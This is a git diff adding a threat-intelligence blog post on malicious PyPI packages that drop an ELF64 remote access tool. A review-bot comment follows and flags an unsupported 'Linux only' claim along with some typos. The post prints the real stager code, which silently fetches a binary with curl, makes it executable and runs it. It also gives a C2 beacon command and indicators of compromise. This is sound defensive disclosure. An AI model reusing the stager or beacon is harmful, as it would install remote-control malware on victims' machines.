diff --git a/src/assets/images/network-rat.jpg b/src/assets/images/network-rat.jpg new file mode 100644 index 0000000..7545801 Binary files /dev/null and b/src/assets/images/network-rat.jpg differ diff --git a/src/content/post/elf64-rat-malware.md b/src/content/post/elf64-rat-malware.md new file mode 100644 index 0000000..1192c5c --- /dev/null +++ b/src/content/post/elf64-rat-malware.md 
@@ -0,0 +1,109 @@ +--- +publishDate: 2024-02-29T00:00:00Z +title: Novel ELF64 Remote Access Tool Embedded in Malicious PyPI Uploads +excerpt: Analyzing a Linux-targeted malware campaign on the Python Package Index. +category: Threat Intelligence +image: ~/assets/images/network-rat.jpg +tags: + - malware + - threat intelligence +--- +## Introduction + +On 19 February, Vipyr Security scanning services notified us of a malicious upload to the Python Package Index by the name `real-ids`. This Python package, and subsequent uploads attributed to the same threat actor, contains 'remote access tool' capabilities-- that is, remote code execution, remote file upload and download, and a beaconing service to an HTTPS-based C2. + +**Packages:** + +- `real-ids@0.0.1` 19 February 2024 @ 01:47 PM UTC +- `real-ids@0.0.2` 19 February 2024 @ 01:52 PM +- `real-ids@0.0.3` 20 February 2024 @ 01:43 AM +- `real-ids@0.0.4` 20 February 2024 @ 02:24 AM +- `real-ids@0.0.5` 20 February 2024 @ 02:30 AM +- `coloredtxt@0.0.1` 20 February 2024 @ 07:27 AM (Benign) +- `coloredtxt@0.0.2` 20 February 2024 @ 08:55 AM +- `beautifultext@0.0.1`20 February 2024 @ 11:17 AM +- `minisound@0.0.1` 21 February 2024 @ 12:51 AM (Benign) +- `minisound@0.0.2` 28 February 2024 @ 12:43 AM + +## Analysis + +The malicious payload is placed in `os.py` files within typos of popular packages. During the initialization of the file, an import is made from the `os.py` file, executing the payload. Payload occurs in a string of multiple base64/hex encodings, which are decoded and then executed. 
+ +```python +platform = sys.platform[0:1] +print(sys.argv[0]) +if platform != "w": + try: + url = 'hxxps://arcashop.org/boards.php?type=' + platform + local_filename = os.environ['HOME'] + '/oshelper' + os.system("curl --silent " + url + " --cookie 'oshelper_session=10237477354732022837433' --output " + local_filename) + sleep(3) + + os.system("chmod +x " + local_filename) + os.system(local_filename + " > /dev/null 2>&1 &") + except ZeroDivisionError as error: + sleep(0) + finally: + sleep(0) +``` + + Curl is invoked silently with `os.system` and the `--cookie 'oshelper_session=10237477354732022837433` parameter set, and the payload is downloaded from the PyPI Online or Arcashop domain. Interestingly, the first character of the result of `sys.platform` is passed as a parameter to the API, and will not function if the system is not Linux. + +We've noted two endpoints that this malware connects to to obtain the payload: + +- `hxxps://pypi.online/cloud.php?type=` +- `hxxps://arcashop.org/boards.php?type=` + +This was resistant to many our efforts to download when utilizing mobile, residential, cloud, and business/education VPN tunnels. + +Various Python-based payloads have been detected, including encoding the payload itself in base64. This trait was observed with the `pypi.online` endpoint, but not the `arcashop.org` endpoint. + +The payload itself is an ELF64 which contains static linking to libcurl as well as several handcrafted functions: + +- **XEncoding:** An XOR encryption function with a custom XOR table. +- **AcceptRequest:** Primary means to take payloads from C2. +- **FConnectProxy:** Resolves user parameters for `SendPost` function and time seeds random sources. +- **SendPost:** Primary beacon function with custom user agents. Also contains user agent information for the request. Attempts to communicate via HTTPS and falls back to HTTP. 
+ +The payload itself also contains several functions specifically related to interactions with the C2 itself: + +- **Ping:** Send a 'Success' response to C2. +- **MsgDown**: Upload Files +- **MsgUp**: Download Files +- **MsgCmd**: run command with commandline `%s 2>&1 &` and send results back to C2. +- **MsgRun**: run command with commandline `%s 2>&1 &` and do not send results to C2. + +```bash +curl -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5786.212 Safari/537.36" \ +-H "Content-Type: application/x-www-form-urlencoded" \ +-H "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*" \ +-H "Connection: Keep-Alive" \ +--data "lkjyhnmiop=????&odldjshrn=????&ikdiwoep=????" \ +--max-time 300 \ +-k -v \ +"hxxps://jdkgradle.com/jdk/update/check" +``` + +*Note: The data parameters passed in the POST form data are based on time-seeded random and a parameter the author calls 'tuid' (time-based user ID, presumably).* + +The payload will respond with two codes back to the API: + +- `0x89a:` Success +- `0x89b:` Failure + +The payload will beacon to `hxxps://jdkgradle.com/jdk/update/check` every 100 seconds to receive commands from the C2. + +## Indicators of Compromise (IOCs) + +```text +Dropped File Location: ~/oshelper +SHA256 973f7939ea03fd2c9663dafc21bb968f56ed1b9a56b0284acf73c3ee141c053c +MD5 33c9a47debdb07824c6c51e13740bdfe +pypi.online 198.54.115.27 +arcashop.org 68.65.120.235 +jdkgradle.com 199.188.200.88 +``` + +## Closing Remarks + +All packages have been reported to and removed by the Python Package Index administrators. A special thanks to our friends at [Phylum](https://www.phylum.io/) for helping us with the initial payload, security administrators at PyPI for their rapid handling of our reports, and Vipyr Security community contributors for the reversal and analysis of the malicious code.
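Review bot: the claim in the Analysis section that the stager "will not function if the system is not Linux" is not supported by the snippet shown in the same hunk. The only gate in the code is `if platform != "w":` on `sys.platform[0:1]`, which excludes Windows but lets macOS (`darwin` → `d`) and any other non-Windows platform run the `curl`/`chmod +x`/background-execute sequence; only the server-side `type=` parameter could restrict delivery to Linux, and the hunk presents no evidence of that. Suggest rewording to "the stager runs on any non-Windows platform and passes the first character of `sys.platform` to the download endpoint, which presumably selects the payload server-side", or stating what was observed for the `d` value. Related consistency issues in the same hunk: the prose says the payload "is downloaded from the PyPI Online or Arcashop domain" while the snippet only hardcodes `hxxps://arcashop.org/boards.php?type=`, so either show the `pypi.online` variant or say the snippet is one of the two observed stagers; the inline reference `--cookie 'oshelper_session=10237477354732022837433` is missing its closing quote and backtick; the `MsgDown`/`MsgUp` entries should say from whose perspective "Upload"/"Download" is meant (C2 or victim), since readers will otherwise assume the victim's; the `MsgCmd` description ("run command with commandline `%s 2>&1 &` and send results back") is worth a sentence on how output is captured given the trailing `&`, if that is known from the reversal. Minor text fixes: "many our efforts" → "many of our efforts", `` `beautifultext@0.0.1`20 February `` is missing a space, and only the first timestamp in the package list carries "UTC".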